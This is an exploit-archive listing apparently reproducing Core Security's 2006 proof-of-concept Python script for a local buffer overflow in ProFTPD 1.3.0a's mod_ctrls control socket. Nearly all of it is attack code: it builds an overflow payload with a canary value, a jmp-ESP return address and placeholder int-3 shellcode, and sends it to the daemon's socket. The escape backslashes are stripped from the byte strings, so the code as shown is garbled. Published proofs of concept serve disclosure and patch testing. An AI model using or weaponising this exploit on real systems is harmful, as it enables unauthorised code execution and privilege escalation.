ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
# Published : 2006-12-13
# Author : Core Security
# Previous Title : Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit
# Next Title : Microsoft Word Document (malformed pointer) Proof of Concept

#    Core Security Technologies - Corelabs Advisory
#    ProFTPD Controls buffer overflow

import socket
import os, os.path,stat

#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "x0axff"
trampoline = "x77xe7xffxff" # jmp ESP on vdso
shellcode = "xccxccxccxccxccxccxccxccxcc" # inocuous "int 3"

#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

#Setup socket
#
if os.path.exists(mySocket):
       os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)

#Send payload
#
s.send("1")
s.send("1")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"")
s.send(payload)

#Finished
#
s.close()

# www.Syue.com [2006-12-13]